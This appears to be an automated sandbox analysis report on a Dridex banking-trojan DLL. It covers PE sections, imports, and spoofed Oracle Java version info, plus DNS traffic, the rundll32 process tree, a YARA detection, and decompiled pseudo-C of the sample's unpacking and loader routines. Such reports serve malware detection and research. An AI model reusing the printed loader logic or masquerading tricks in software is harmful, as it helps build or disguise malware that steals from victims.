                                                                                      .crt0x280000x331c0x1800False0.79052734375MMDF mailbox7.46423038313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x2c0000xe880x400False0.4248046875data3.06187161643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x2d0000x26c0x400False0.548828125data4.2946697642IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_VERSION0x2c0600x33cdata

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllGetProfileSectionW, CloseHandle, OpenSemaphoreW, LoadLibraryW, OutputDebugStringA, CreateFileW, GetProfileSectionA
                                                                                      USER32.dllTranslateMessage
                                                                                      CLUSAPI.dllClusterEnum
                                                                                      ADVAPI32.dllRegOverridePredefKey
                                                                                      RASAPI32.dllRasGetConnectionStatistics
                                                                                      ole32.dllCreatePointerMoniker, CreateStreamOnHGlobal

                                                                                      Version Infos

                                                                                      DescriptionData
                                                                                      LegalCopyrightCopyright 2018
                                                                                      InternalNamex2otfb
                                                                                      FileVersion7.2.5422.00
                                                                                      Full Version7.2.5_000-b00
                                                                                      CompanyNameOracle Corporation
                                                                                      ProductNameXhot(BM) Ltloehey YO 8
                                                                                      ProductVersion7.2.5422.00
                                                                                      FileDescriptionJava(TM) Platform SE binary
                                                                                      OriginalFilenamex2otfb.dll
                                                                                      Translation0x0000 0x04b0

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 13, 2021 07:26:05.785856009 CEST4971453192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:05.838548899 CEST53497148.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:06.720690966 CEST5802853192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:06.769577980 CEST53580288.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:08.308527946 CEST5309753192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:08.357296944 CEST53530978.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:08.849631071 CEST4925753192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:08.906475067 CEST53492578.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:09.074315071 CEST6238953192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:09.149528980 CEST53623898.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:09.928435087 CEST4991053192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:09.982691050 CEST53499108.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:10.984586954 CEST5585453192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:11.036190987 CEST53558548.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:12.195267916 CEST6454953192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:12.255630970 CEST53645498.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:14.180327892 CEST6315353192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:14.229007959 CEST53631538.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:14.990048885 CEST5299153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:15.041765928 CEST53529918.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:15.854332924 CEST5370053192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:15.903060913 CEST53537008.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:16.929326057 CEST5172653192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:16.978147984 CEST53517268.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:18.083895922 CEST5679453192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:18.140892029 CEST53567948.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:19.195698977 CEST5653453192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:19.247380972 CEST53565348.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:19.980705023 CEST5662753192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:20.029311895 CEST53566278.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:21.338857889 CEST5662153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:21.387588024 CEST53566218.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:22.206459045 CEST6311653192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:22.266541958 CEST53631168.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:23.233056068 CEST6407853192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:23.281907082 CEST53640788.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:24.919857979 CEST6480153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:24.968652010 CEST53648018.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:25.805102110 CEST6172153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:25.854413033 CEST53617218.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:27.032040119 CEST5125553192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:27.080962896 CEST53512558.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:36.538136959 CEST6152253192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:36.598098993 CEST53615228.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:26:52.978501081 CEST5233753192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:26:53.030014038 CEST53523378.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:01.689582109 CEST5504653192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:01.751342058 CEST53550468.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:09.450536013 CEST4961253192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:09.515995026 CEST53496128.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:14.444190979 CEST4928553192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:14.502707958 CEST53492858.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:30.695261002 CEST5060153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:30.827620983 CEST53506018.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:31.378300905 CEST6087553192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:31.437693119 CEST53608758.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:31.978159904 CEST5644853192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:32.037575960 CEST53564488.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:32.342175007 CEST5917253192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:32.408808947 CEST53591728.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:32.474756956 CEST6242053192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:32.532470942 CEST53624208.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:33.076623917 CEST6057953192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:33.194742918 CEST53605798.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:33.780787945 CEST5018353192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:33.837811947 CEST53501838.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:34.316339970 CEST6153153192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:34.378895044 CEST53615318.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:35.115670919 CEST4922853192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:35.172749043 CEST53492288.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:36.271333933 CEST5979453192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:36.320132971 CEST53597948.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:36.726064920 CEST5591653192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:36.783003092 CEST53559168.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:52.235490084 CEST5275253192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:52.299331903 CEST53527528.8.8.8192.168.2.4
                                                                                      May 13, 2021 07:27:53.974703074 CEST6054253192.168.2.48.8.8.8
                                                                                      May 13, 2021 07:27:54.036302090 CEST53605428.8.8.8192.168.2.4

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:07:26:13
                                                                                      Start date:13/05/2021
                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll'
                                                                                      Imagebase:0x2a0000
                                                                                      File size:116736 bytes
                                                                                      MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:26:13
                                                                                      Start date:13/05/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:26:14
                                                                                      Start date:13/05/2021
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1
                                                                                      Imagebase:0xc60000
                                                                                      File size:61952 bytes
                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:26:45
                                                                                      Start date:13/05/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 764
                                                                                      Imagebase:0x900000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Executed Functions

                                                                                        C-Code - Quality: 42%
                                                                                        			E02D823D4(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                        				char _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				char _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				void* _v68;
                                                                                        				char* _v72;
                                                                                        				int _v76;
                                                                                        				long _v80;
                                                                                        				long _v84;
                                                                                        				DWORD* _v88;
                                                                                        				intOrPtr _v92;
                                                                                        				int _v96;
                                                                                        				intOrPtr* _v100;
                                                                                        				intOrPtr _v104;
                                                                                        				intOrPtr _v108;
                                                                                        				intOrPtr _v112;
                                                                                        				void* _v116;
                                                                                        				intOrPtr _v120;
                                                                                        				intOrPtr _v124;
                                                                                        				intOrPtr _v128;
                                                                                        				intOrPtr _v132;
                                                                                        				intOrPtr _v136;
                                                                                        				char* _v140;
                                                                                        				intOrPtr _v144;
                                                                                        				intOrPtr _v148;
                                                                                        				intOrPtr _v152;
                                                                                        				intOrPtr _v156;
                                                                                        				unsigned int _v160;
                                                                                        				signed int _v164;
                                                                                        				signed int _v168;
                                                                                        				signed int _v172;
                                                                                        				intOrPtr _v176;
                                                                                        				int _v180;
                                                                                        				char* _v184;
                                                                                        				intOrPtr _v188;
                                                                                        				intOrPtr _v192;
                                                                                        				char _v196;
                                                                                        				intOrPtr* _t142;
                                                                                        				int _t148;
                                                                                        				int _t156;
                                                                                        				int _t160;
                                                                                        				unsigned int _t180;
                                                                                        				int _t196;
                                                                                        				intOrPtr _t230;
                                                                                        				intOrPtr _t232;
                                                                                        				void* _t237;
                                                                                        				intOrPtr _t240;
                                                                                        				void* _t247;
                                                                                        				intOrPtr _t251;
                                                                                        				intOrPtr _t258;
                                                                                        				DWORD* _t271;
                                                                                        				void* _t275;
                                                                                        				intOrPtr* _t278;
                                                                                        				intOrPtr* _t279;
                                                                                        
                                                                                        				_t142 = _a4;
                                                                                        				_v20 = 0;
                                                                                        				_t247 =  *_t142;
                                                                                        				 *0x2d84418 = 1;
                                                                                        				asm("movaps xmm0, [0x2d83010]");
                                                                                        				asm("movups [0x2d84428], xmm0");
                                                                                        				_v48 = _t142;
                                                                                        				_v52 =  *((intOrPtr*)(_t142 + 0x48));
                                                                                        				_v56 =  *((intOrPtr*)(_v48 + 0x6c));
                                                                                        				_v196 = _t247;
                                                                                        				_v192 =  *((intOrPtr*)(_v48 + 0x24));
                                                                                        				_v188 = 4;
                                                                                        				_v184 =  &_v20;
                                                                                        				_v60 =  *((intOrPtr*)(_t142 + 0x1c));
                                                                                        				_v64 = 4;
                                                                                        				_v68 = _t247;
                                                                                        				_v72 =  &_v20;
                                                                                        				_t148 = VirtualProtect(__edi, __esi, __ebx, _t271); // executed
                                                                                        				_v76 = _t148;
                                                                                        				_v196 = _v68;
                                                                                        				_v192 = 0;
                                                                                        				_v188 =  *((intOrPtr*)(_v48 + 0x24));
                                                                                        				_v80 = 0x400;
                                                                                        				_v84 = 2;
                                                                                        				_v88 =  &_v20;
                                                                                        				_v92 = 0;
                                                                                        				E02D81E7B();
                                                                                        				E02D81094(_v68,  *((intOrPtr*)(_v48 + 0x44)), _v56);
                                                                                        				E02D81E7B( *((intOrPtr*)(_v48 + 0x44)), 0, _v56);
                                                                                        				_t156 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                        				_t278 = _t275 - 0x94;
                                                                                        				_t237 = _v68;
                                                                                        				_t258 =  *((intOrPtr*)(_t237 + 0x3c));
                                                                                        				_v96 = _t156;
                                                                                        				_v100 = _v68 + 0x3c;
                                                                                        				_v104 = _t237;
                                                                                        				_v108 = _t258;
                                                                                        				if(_t258 != 0) {
                                                                                        					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                        				}
                                                                                        				_v120 = _v104;
                                                                                        				if(_v52 != 0) {
                                                                                        					_v144 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
                                                                                        					_v148 = 0;
                                                                                        					while(1) {
                                                                                        						_t230 = _v144;
                                                                                        						_v156 = _v148;
                                                                                        						_t180 =  *(_t230 + 0x24);
                                                                                        						_v160 = _t180;
                                                                                        						_v164 = _t180 >> 0x1e;
                                                                                        						_v168 = _v160 >> 0x1f;
                                                                                        						_v172 = _v160 >> 0x0000001d & 0x00000001;
                                                                                        						_v196 = _v68 +  *((intOrPtr*)(_t230 + 0xc));
                                                                                        						_v192 =  *((intOrPtr*)(_t230 + 8));
                                                                                        						_v188 =  *((intOrPtr*)(0x2d84418 + ((_v164 & 0x00000001) << 4) + (_v168 << 3) + (_v172 << 2)));
                                                                                        						_v184 =  &_v20;
                                                                                        						_v176 = _t230;
                                                                                        						_t196 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                        						_t278 = _t278 - 0x10;
                                                                                        						_t232 = _v156 + 1;
                                                                                        						_v180 = _t196;
                                                                                        						_v144 = _v176 + 0x28;
                                                                                        						_v148 = _t232;
                                                                                        						if(_t232 == _v52) {
                                                                                        							goto L11;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L11:
                                                                                        				 *_t278 = _v68;
                                                                                        				_v124 = _v68 +  *((intOrPtr*)(_v48 + 0x10));
                                                                                        				_t160 = DisableThreadLibraryCalls(??);
                                                                                        				_t279 = _t278 - 4;
                                                                                        				_t240 =  *_v100;
                                                                                        				_v152 = _t160;
                                                                                        				_v112 = _t240;
                                                                                        				_v116 = _v68;
                                                                                        				if(_t240 == 0) {
                                                                                        					L7:
                                                                                        					_t251 = _v48;
                                                                                        					_v44 =  *((intOrPtr*)(_t251 + 0x40));
                                                                                        					_v40 =  *((intOrPtr*)(_t251 + 0x4c));
                                                                                        					_v36 =  *((intOrPtr*)(_t251 + 0x20));
                                                                                        					_v32 =  *((intOrPtr*)(_t251 + 0x54));
                                                                                        					_v28 =  *((intOrPtr*)(_t251 + 0x58));
                                                                                        					_v24 = _v124;
                                                                                        					 *_t279 = _t251;
                                                                                        					_v196 = 0;
                                                                                        					_v192 = 0x74;
                                                                                        					_v128 =  *((intOrPtr*)(_v116 + 0x28));
                                                                                        					_v132 = 0;
                                                                                        					_v136 = 0x74;
                                                                                        					_v140 =  &_v44;
                                                                                        					E02D81E7B();
                                                                                        					if(_v128 != 0) {
                                                                                        						_t278 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                        						goto __eax;
                                                                                        					}
                                                                                        					return 1;
                                                                                        				} else {
                                                                                        					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                        					goto L7;
                                                                                        				}
                                                                                        			}

































































                                                                                        0x02d823e0
                                                                                        0x02d823ee
                                                                                        0x02d823f5
                                                                                        0x02d823f7
                                                                                        0x02d82401
                                                                                        0x02d82408
                                                                                        0x02d82412
                                                                                        0x02d82418
                                                                                        0x02d82421
                                                                                        0x02d8242a
                                                                                        0x02d8242d
                                                                                        0x02d82431
                                                                                        0x02d82439
                                                                                        0x02d8243d
                                                                                        0x02d82440
                                                                                        0x02d82443
                                                                                        0x02d82446
                                                                                        0x02d82449
                                                                                        0x02d82463
                                                                                        0x02d82469
                                                                                        0x02d8246c
                                                                                        0x02d82474
                                                                                        0x02d82478
                                                                                        0x02d8247b
                                                                                        0x02d8247e
                                                                                        0x02d82481
                                                                                        0x02d82484
                                                                                        0x02d824a0
                                                                                        0x02d824bd
                                                                                        0x02d824e2
                                                                                        0x02d824e4
                                                                                        0x02d824ed
                                                                                        0x02d824f0
                                                                                        0x02d824fa
                                                                                        0x02d824fd
                                                                                        0x02d82500
                                                                                        0x02d82503
                                                                                        0x02d82506
                                                                                        0x02d8255a
                                                                                        0x02d8255a
                                                                                        0x02d82566
                                                                                        0x02d82569
                                                                                        0x02d825ed
                                                                                        0x02d825f3
                                                                                        0x02d8265e
                                                                                        0x02d82664
                                                                                        0x02d82679
                                                                                        0x02d8267f
                                                                                        0x02d82682
                                                                                        0x02d8268b
                                                                                        0x02d8269a
                                                                                        0x02d826ac
                                                                                        0x02d826dd
                                                                                        0x02d826e0
                                                                                        0x02d826e4
                                                                                        0x02d826e8
                                                                                        0x02d826ef
                                                                                        0x02d826f5
                                                                                        0x02d826f7
                                                                                        0x02d82700
                                                                                        0x02d82711
                                                                                        0x02d82717
                                                                                        0x02d8271d
                                                                                        0x02d82723
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x02d82729
                                                                                        0x02d8265e
                                                                                        0x02d8261a
                                                                                        0x02d82628
                                                                                        0x02d82630
                                                                                        0x02d82633
                                                                                        0x02d82635
                                                                                        0x02d8263b
                                                                                        0x02d82647
                                                                                        0x02d8264d
                                                                                        0x02d82650
                                                                                        0x02d82653
                                                                                        0x02d82571
                                                                                        0x02d82581
                                                                                        0x02d82587
                                                                                        0x02d8258d
                                                                                        0x02d82593
                                                                                        0x02d82599
                                                                                        0x02d8259f
                                                                                        0x02d825a5
                                                                                        0x02d825a8
                                                                                        0x02d825ab
                                                                                        0x02d825b3
                                                                                        0x02d825bb
                                                                                        0x02d825be
                                                                                        0x02d825c1
                                                                                        0x02d825c7
                                                                                        0x02d825cd
                                                                                        0x02d825d8
                                                                                        0x02d82532
                                                                                        0x02d82538
                                                                                        0x02d82538
                                                                                        0x02d82614
                                                                                        0x02d82659
                                                                                        0x02d8251f
                                                                                        0x00000000
                                                                                        0x02d8251f

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.748611508.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID: t
                                                                                        • API String ID: 544645111-2238339752
                                                                                        • Opcode ID: 6f7aed4da9868916cbd44910662deadcfe4d28a0495861adaf2be10746817557
                                                                                        • Instruction ID: 4349b72badf04be6b98bdb65bd2d70846fff538553fceede0f390d48bda2edbb
                                                                                        • Opcode Fuzzy Hash: 6f7aed4da9868916cbd44910662deadcfe4d28a0495861adaf2be10746817557
                                                                                        • Instruction Fuzzy Hash: 18B199B4E042288FDB14DF68C990A9DBBF1BF48304F1585AAE948AB351D730AD81CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.748611508.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 033d263155ffc3d0b6236b8629689c658cf4e2d9a96ebed7f8aabdbc96411034
                                                                                        • Instruction ID: 332f9a0c06c4656d91121ef90dc76bf69d12dff7c7c2bf6ff56db086336714ac
                                                                                        • Opcode Fuzzy Hash: 033d263155ffc3d0b6236b8629689c658cf4e2d9a96ebed7f8aabdbc96411034
                                                                                        • Instruction Fuzzy Hash: E641E2B5D012199FDB08DFA8D894AAEBBF1FF48314F14852DE948AB340D375A845CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        C-Code - Quality: 78%
                                                                                        			E10010754(void* __ecx) {
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t156;
                                                                                        				signed char* _t160;
                                                                                        				char _t163;
                                                                                        				char _t181;
                                                                                        				intOrPtr _t190;
                                                                                        				char _t191;
                                                                                        				intOrPtr _t197;
                                                                                        				intOrPtr _t202;
                                                                                        				char _t205;
                                                                                        				void* _t214;
                                                                                        				void* _t215;
                                                                                        				char _t217;
                                                                                        				char _t218;
                                                                                        				char _t225;
                                                                                        				char _t240;
                                                                                        				char _t243;
                                                                                        				char _t246;
                                                                                        				char _t249;
                                                                                        				char _t252;
                                                                                        				char _t256;
                                                                                        				char _t261;
                                                                                        				void* _t270;
                                                                                        				void* _t271;
                                                                                        				char _t273;
                                                                                        				char _t274;
                                                                                        				void* _t278;
                                                                                        				char _t279;
                                                                                        				char _t280;
                                                                                        				char _t284;
                                                                                        				intOrPtr* _t293;
                                                                                        				signed char _t296;
                                                                                        				signed char _t297;
                                                                                        				intOrPtr* _t322;
                                                                                        				intOrPtr* _t327;
                                                                                        				intOrPtr* _t349;
                                                                                        				intOrPtr* _t365;
                                                                                        				char _t366;
                                                                                        				intOrPtr* _t371;
                                                                                        				intOrPtr* _t374;
                                                                                        				intOrPtr* _t379;
                                                                                        				char _t384;
                                                                                        				char _t385;
                                                                                        				char _t386;
                                                                                        				char _t387;
                                                                                        				char _t388;
                                                                                        				char _t389;
                                                                                        				char _t395;
                                                                                        				char _t397;
                                                                                        				char _t403;
                                                                                        				char _t405;
                                                                                        				intOrPtr* _t406;
                                                                                        				signed int _t408;
                                                                                        				intOrPtr* _t411;
                                                                                        				intOrPtr* _t413;
                                                                                        				signed int _t415;
                                                                                        				void* _t416;
                                                                                        				void* _t417;
                                                                                        				char _t422;
                                                                                        				intOrPtr* _t425;
                                                                                        				void* _t427;
                                                                                        				intOrPtr* _t429;
                                                                                        				void* _t430;
                                                                                        				void* _t431;
                                                                                        
                                                                                        				_t416 = __ecx;
                                                                                        				_t156 =  *0x1001d1f8;
                                                                                        				if(_t156 == 0x255be0d1) {
                                                                                        					_t156 = E100135F4(0x30);
                                                                                        					 *0x1001d1f8 = _t156;
                                                                                        				}
                                                                                        				if( *((char*)(_t156 + 0xb)) == 0 || _t416 != 0) {
                                                                                        					_t417 = _t430 + 0x48;
                                                                                        					E10013670(_t417, 0, 0x11c);
                                                                                        					_t431 = _t430 + 0xc;
                                                                                        					 *((intOrPtr*)(_t431 + 0x48)) = 0x11c;
                                                                                        					if(E10013044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
                                                                                        						_push(_t417);
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        					}
                                                                                        					_t406 =  *0x1001d1f8;
                                                                                        					_t160 = _t431 + 0x4c;
                                                                                        					_t296 =  *_t160;
                                                                                        					 *(_t406 + 8) = _t296;
                                                                                        					_t297 = _t160[4];
                                                                                        					 *(_t406 + 9) = _t297;
                                                                                        					 *((char*)(_t406 + 0xa)) = _t160[0x110];
                                                                                        					 *((intOrPtr*)(_t406 + 4)) =  *((intOrPtr*)(_t431 + 0x54));
                                                                                        					 *((char*)(_t406 + 0xc)) = 0 | _t160[0x116] != 0x00000001;
                                                                                        					 *_t406 = (_t297 & 0x000000ff) + ((_t296 & 0x000000ff) << 4) - 0x50;
                                                                                        					_t163 = E1001101C(_t406);
                                                                                        					 *((intOrPtr*)(_t431 + 0x198)) = 0;
                                                                                        					 *((char*)( *0x1001d1f8 + 0xb)) = _t163;
                                                                                        					_t365 = E10013044(0x8b9d0da7, 0x8335dc52, _t163, _t163);
                                                                                        					if(_t365 == 0) {
                                                                                        						L12:
                                                                                        						_t366 = 0;
                                                                                        						L13:
                                                                                        						 *((char*)( *0x1001d1f8 + 0x28)) = _t366;
                                                                                        						if( *((intOrPtr*)(E10010754(0))) >= 0x10) {
                                                                                        							_push(6);
                                                                                        							memcpy(_t431 + 0x164, 0x1001bce0, 0 << 2);
                                                                                        							_t431 = _t431 + 0xc;
                                                                                        							 *((intOrPtr*)(_t431 + 0x1c)) = 0;
                                                                                        							E1000F5A8(_t431 + 0x24, 0);
                                                                                        							_t408 = 0;
                                                                                        							__eflags = 0;
                                                                                        							do {
                                                                                        								E1000F84C(_t431 + 0x24, E1000F4F0(_t431 + 0x20) + 4);
                                                                                        								 *((intOrPtr*)(E1000F4E0(_t431 + 0x24, E1000F4F0(_t431 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t431 + 0x164 + _t408 * 4));
                                                                                        								_t408 = _t408 + 1;
                                                                                        								 *((intOrPtr*)(_t431 + 0x1c)) =  *((intOrPtr*)(_t431 + 0x1c)) + 1;
                                                                                        								__eflags = _t408 - 6;
                                                                                        							} while (_t408 < 6);
                                                                                        							_push(0);
                                                                                        							E10015558(_t431 + 0xc, _t431 + 0x1c, 0x80000002);
                                                                                        							E1000F678(_t431 + 0x20);
                                                                                        							E10015588(_t431 + 8, _t431 + 0x1c0, 0x5e9822cf);
                                                                                        							_t181 = E1001583C(_t431 + 4, __eflags,  *((intOrPtr*)(_t431 + 0x1c0)));
                                                                                        							_t409 = _t181;
                                                                                        							E1000DFDC(_t431 + 0x1c0);
                                                                                        							__eflags = _t181;
                                                                                        							if(_t181 != 0) {
                                                                                        								E10015588(_t431 + 8, _t431 + 0x1c8, 0x80c4a2b7);
                                                                                        								_t422 = E1001583C(_t431 + 4, __eflags,  *((intOrPtr*)(_t431 + 0x1c8)));
                                                                                        								E1000DFDC(_t431 + 0x1c8);
                                                                                        								_t409 = _t431 + 0x1d0;
                                                                                        								E10015588(_t431 + 8, _t431 + 0x1d0, 0xa89c042f);
                                                                                        								_t403 = E1001583C(_t431 + 4, __eflags,  *((intOrPtr*)(_t431 + 0x1d0)));
                                                                                        								E1000DFDC(_t431 + 0x1d0);
                                                                                        								__eflags = _t422;
                                                                                        								if(_t422 != 0) {
                                                                                        									__eflags = _t422 - 5;
                                                                                        									if(_t422 != 5) {
                                                                                        										__eflags = _t422 - 2;
                                                                                        										if(_t422 != 2) {
                                                                                        											L58:
                                                                                        											E1000D020(_t431 + 0xc);
                                                                                        											__eflags =  *((char*)(_t431 + 8));
                                                                                        											if( *((char*)(_t431 + 8)) == 0) {
                                                                                        												L65:
                                                                                        												_t190 = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *((intOrPtr*)(_t431 + 4)) = 0;
                                                                                        												goto L66;
                                                                                        											}
                                                                                        											_t384 =  *((intOrPtr*)(_t431 + 4));
                                                                                        											__eflags = _t384;
                                                                                        											if(_t384 == 0) {
                                                                                        												L61:
                                                                                        												_t240 = 1;
                                                                                        												L63:
                                                                                        												__eflags = _t240;
                                                                                        												if(_t240 == 0) {
